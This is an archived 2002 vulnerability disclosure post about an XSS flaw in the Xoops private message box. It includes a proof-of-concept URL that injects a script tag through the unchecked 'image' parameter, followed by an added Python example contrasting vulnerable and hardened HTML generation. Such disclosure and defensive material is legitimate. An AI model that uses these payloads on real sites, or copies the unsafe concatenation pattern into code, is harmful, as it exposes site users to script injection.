Xoops topics : One more time

From: Cabezon Aurélien (aurelien.cabezonat_private)
Date: Tue Jan 29 2002 - 09:09:01 PST


    Hi again,
    
    I just found another script injection issue in the Xoops Private Message Box.
    
    http://xooped-site/pmlite.php?to_userid=[USER_ID_OF_TARGET]&msg_id=&image=foo.gif'><script>alert("test");</script><img%20src='http://www.isecurelabs.com/images/barre.jpg&op=submit&theme=snow&subject=Are you sure?&message=really?&submit=Submit
    
    Again a lack of checks on user input in the *image* variable.
    
    To be continued...
    
    
    ---
    Cabezon Aurélien | aurelien.cabezonat_private
    http://www.iSecureLabs.com | French Security Portal
    
    ____________________________________________
    " Know that today is the most beautiful day of your life,
    for it is the first of those you have left to live "
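The weakness reported above is that the `image` parameter is placed inside a single-quoted `src` attribute without any check, so a value containing a quote and `>` closes the attribute and starts new markup. The following is an added example (not Xoops code, and not from the poster) contrasting that pattern with a hardened version that allowlists the file name and escapes for the attribute context; `IMAGE_BASE` and the allowlist pattern are assumptions.

```python
import html
import re
from typing import Optional

# Assumed policy (not from the page): the image name must be a bare file name
# with a common image extension; no path separators, quotes or angle brackets.
IMAGE_NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}\.(gif|jpe?g|png)$")

# Assumed base path for the smiley images; the real Xoops value is not on the page.
IMAGE_BASE = "/images/smilies/"


def unsafe_image_tag(image: str) -> str:
    """Reproduces the weakness described in the post: the parameter is dropped
    straight into a single-quoted src attribute, so a quote followed by '>'
    terminates the attribute and the tag and whatever follows is rendered."""
    return "<img src='" + IMAGE_BASE + image + "'>"


def safe_image_tag(image: str) -> Optional[str]:
    """Hardened version: reject anything that is not a plain image file name,
    then HTML-escape for the attribute context anyway (defence in depth).
    Returns None when the value is rejected."""
    if not IMAGE_NAME_RE.fullmatch(image):
        return None
    return "<img src='" + html.escape(IMAGE_BASE + image, quote=True) + "'>"


# Constructed sample input with the shape of the payload quoted in the post
# (URL-decoded): a file name, a closing quote and '>', then injected markup.
PAYLOAD = "foo.gif'><script>alert(\"test\");</script><img src='http://example.invalid/x.jpg"

if __name__ == "__main__":
    print(unsafe_image_tag(PAYLOAD))   # the <script> element reaches the page
    print(safe_image_tag(PAYLOAD))     # None: rejected by the allowlist
    print(safe_image_tag("foo.gif"))   # <img src='/images/smilies/foo.gif'>
```

Even when the allowlist is bypassed by a later code change, `html.escape(..., quote=True)` turns `'` into `&#x27;`, so the attribute cannot be closed early.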
    